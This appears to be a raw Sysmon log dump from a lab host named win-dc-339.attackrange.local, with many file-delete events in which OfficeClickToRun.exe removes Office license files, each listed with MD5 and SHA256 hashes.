Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_Trial2-pl.xrm-msMD5=AFEAC97E4728E5A1C8DA345DBF18A048,SHA256=830BA3C2FCB2E0F4A5EDB0EDC1332CC236DBC5DA97C2AAD4DB709AD85A1E2136,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_Trial-ul-oob.xrm-msMD5=C3D2131BF355722BF44ECE162B31A955,SHA256=641F75337E22D49C8CB66CB06A9A276C60A70FC8F14EC99CFAC47AA18D283FEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_Trial-ppd.xrm-msMD5=7C7F64436AF34E29257061FF003DAEDC,SHA256=017749DA66ED128C7862198A32A7F1B3064C1DC116B55655AA91D3D9D5EAEBB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_Trial-pl.xrm-msMD5=1A28834759F48E44483D6E9959C7655B,SHA256=D1826771BE6DBDF42DEBBD077FAD8F84CB1E49189241B22CE2BFE49B2C4947BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_Retail-ul-phn.xrm-msMD5=A72664EE4F32D8C492AF881DA9FFA4A6,SHA256=6699A9C0021A20D57A2A3C0563A892D350B4351196EE5EB948152C6C89D5562F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_Retail-ul-oob.xrm-msMD5=E83E5BBC4256EE9665D160CD07C4BED7,SHA256=D633F4C17F1ED840F12D7C0EEEECFD0F25D582CB4C77A9EB99E3BADDD9A12A5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_Retail-ppd.xrm-msMD5=E9FC0820937B082E410693C1609B3B64,SHA256=36142F4AD1F2DA8F7BE564FD32097ECE516A2E538AF1E1ABAA527C317DC51552,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_Retail-pl.xrm-msMD5=BA5C106DF3E8B3D4C484A74B8DFB838E,SHA256=97F4B5AF0F3BA0F7B63FBFE1922020EA35E2A2689CFA43B24CD9715D6222B231,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp6-ul-phn.xrm-msMD5=65D83001A022119625B22DE88A4BA26E,SHA256=0EBD937FE12CE9194AAA3D5AAFFBACB220CA1EA7D9426881BAAAFB53C8DE19EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp6-ul-oob.xrm-msMD5=E52A7F366EB2DDABADF2BE5794B10831,SHA256=363AC50B83B47A278A5F50565715224E09410A34CFF6D36EF2AA09B01435BAC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp6-ppd.xrm-msMD5=2FD677800759FC34CD571D1490876781,SHA256=FEF8B5527D882E18D6FEEC533773C0743F0FD3E8B9DA9C07FB02F755963EACC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp6-pl.xrm-msMD5=FF607077B1206BEAC9B8333A0143BF37,SHA256=20D56338E03EA7E3A48CC0DC505627D26722B587FD487B9FF1368BBA590A9BF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp5-ul-phn.xrm-msMD5=BA85C2721587BF00E9EAD20E35C347D4,SHA256=5E907A6869429B887592E60A735598D7C572F4C11A07223A0C8B7368898A9D17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp5-ul-oob.xrm-msMD5=816F088E12260E88FDAF1B0C8F3A2689,SHA256=AADC0A7905E68465C18B5154038572C1C063110E3A292F6F9DB7A4FF4DE4BCBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp5-ppd.xrm-msMD5=3DCA942CA46C8B4416C67E423D3CA784,SHA256=3CE2C1F9F26BCEEF6D5A5F1A3E0E41A058BCDB3706B2A3A086D104E757979D30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp5-pl.xrm-msMD5=DCA21385AEE8B6BDFDF7C019023193A0,SHA256=62D6523F38ACE7ADB5E9A6800547BA02D651EF2FF7149BBA384FA60DCC91B201,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp4-ul-phn.xrm-msMD5=47AFE4E7B065A021FFFDB84468590D0A,SHA256=641B5AAB00D5B4CA33E201A174A5BAC710FEA13973CADF71B3E35CBF871E79D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp4-ul-oob.xrm-msMD5=CE8CE7C73CD1682DC7D353774C885169,SHA256=F36019478EEC5449EE5657B73DA11A215C69F59B4F53C35988C931BF983060F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp4-ppd.xrm-msMD5=DF547E98D2BD7A755226F67DD5873356,SHA256=860473E6BEBB6044D9B862AFF47F9D06D84A8AD70C52D8CF41C9B79A910B2378,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp4-pl.xrm-msMD5=97F4E2648249FDF5364B056FE430EB4B,SHA256=148FD4BF7B3C2EEE081678F58C4D3EB1140466D8BDDB43C9F9678F665DD954CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp3-ul-phn.xrm-msMD5=F32E4C4975E09DAC8A111C4B40ADEDA0,SHA256=9EC8C08AC4314C5B4B42AE1235DE7965974DAC4BEBE46B4DC8F75096BB926218,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp3-ul-oob.xrm-msMD5=EEBF5A3735F799B22204A415373020B3,SHA256=8F2F1A4CC93F838201023560C44FBAB0D522195DEF9A9BF1EE71BFE15371316C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp3-ppd.xrm-msMD5=BF6AB419ABEE8491A25FE2AF5C69EE7F,SHA256=304F28F34AD3AAFA0DE43EE572C2206A942EC4FEB336F57B71FDB05A7149A45A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp3-pl.xrm-msMD5=A4B6FF0D06624846785E1D1EC9D4C763,SHA256=3E0B221A38C8703CAA70CB011E863374EA05C6E914CAAD8D6CA0476C27DAB80B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp2-ul-phn.xrm-msMD5=967D51E5C1C84B3094B7AFC86BCFF888,SHA256=C0B96521D45200231892EA069848E2F80C69F37DE8A7F74D73FCFD97C056450D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp2-ul-oob.xrm-msMD5=B0D5A255DA1C88FE6E09C25525AF95EA,SHA256=B71654D77D0EE35ABF74FE7596ED9026AA0B35C84920DB57B67B3BC4C46B6865,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp2-ppd.xrm-msMD5=AC903ECDA433A399080CC905A9702DFB,SHA256=F3814B5EE0F3D24F7B4D042622FA03E0D39FB19461E891B5FD74EBB34BC31AE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp2-pl.xrm-msMD5=0907CDC4791D885EF98875BE70382B2D,SHA256=23364881E13AEF3BC8C19E1AD8A2B039962E1D340B6451745EF78BB7CFEA6058,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp-ul-phn.xrm-msMD5=918EEEA7777DB92D28E2ED666C42E1E2,SHA256=71C6F8FBA5DB57F00F4C0D2C13D46DBDC59CF07966D65E937B78F32D57F5D6E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp-ul-oob.xrm-msMD5=33931B6261772830B5E4BBE8A4E1A784,SHA256=1C5558C036F111C5B65FEAFFE5DD0A4F3E5FE717F217BD6C83ABF670CA7ADC44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp-ppd.xrm-msMD5=3F803BEA1677E589D3A61EFCF18F2BD0,SHA256=3070FCAE70BCB91E5371B0422EED938BB8964700F04AFEFDF64543009004F062,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_OEM_Perp-pl.xrm-msMD5=522077F0147955D310420E571A358F6D,SHA256=7F5BA2411C6D032548ECFBD27015C20E453921F29F4165606B30C1F1D3AF9D7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_Grace-ul-oob.xrm-msMD5=83ED3DFDED173989C2F758C980D79876,SHA256=CCA1322B91F4EBB9E9A55979208D753B32AC34D88A358C85E178187D2DE9FA5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_Grace-ppd.xrm-msMD5=F8DF4A527EA5F9E9B8EC003B6E9C4B89,SHA256=3D8E8DC7219D26F1258194A8C16A28B96A5B82AF5F33AF00DBC7EC118E7FB194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusMSDNR_Retail-ul-phn.xrm-msMD5=0CF17D4C4008C45CC8EE54F61B1C1DF4,SHA256=8D00B8BA73E0085AF71BDB5ADADD034868EFDA41E127D7A71CA925AF4C112191,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusMSDNR_Retail-ul-oob.xrm-msMD5=385A0B498BE661FDDB9BFAA32360336A,SHA256=8727B7DCCF0CEC9A7404923159BA3D6AB893C81A270089A096A220314B85505C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusMSDNR_Retail-ppd.xrm-msMD5=2D87420F333B9782BA2C4A4967FF04E3,SHA256=A4A73A80DA1A9A3D9DEC69EF0B691B9646A1A5E405BF2EDA6534C05DF3061328,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusMSDNR_Retail-pl.xrm-msMD5=86C9DA6AC5BEC5AE7619FDFD5CD82F24,SHA256=1E96BB7FCB6CB64CDBBE3C8E99D9E0ED35CF1EEEE59D7A23D5C614F61960B5AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusDemoR_BypassTrial180-ul-oob.xrm-msMD5=C8E442C23DD11A47A7CB14A4F8FA3203,SHA256=839D4F3E568D444A8B65015F33C2B29842331107DFD0CCF62692048B51B082B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusDemoR_BypassTrial180-ppd.xrm-msMD5=9F9D607FA1C912281C99E9BE8313AE0B,SHA256=493ABE42C8C3CFA80B375966CF8D8628ECE2BCF8DE06CAAF3D6AA6A1EEBC60A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-ul-phn.xrm-msMD5=3E00780F52BC45D3A7E5D406B01587C3,SHA256=425755B71089DA7FCF89A9878C86CEBEFB9DC7D5FFBC65E0A1E5321FD549E9A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-ul-oob.xrm-msMD5=C4A3BC226F06F87A37F3BE6CAA17094F,SHA256=46AE28F991C35D8AED73BB574109542C93050EA577EA3C85D426D920A09E070D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-ppd.xrm-msMD5=FB5383DE15EB913047E20CBBE4E893CE,SHA256=121966E35DB4C5202FFE0B8E40B6CFD5D13E83BF8067D0D3727B1AA5C11A06A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 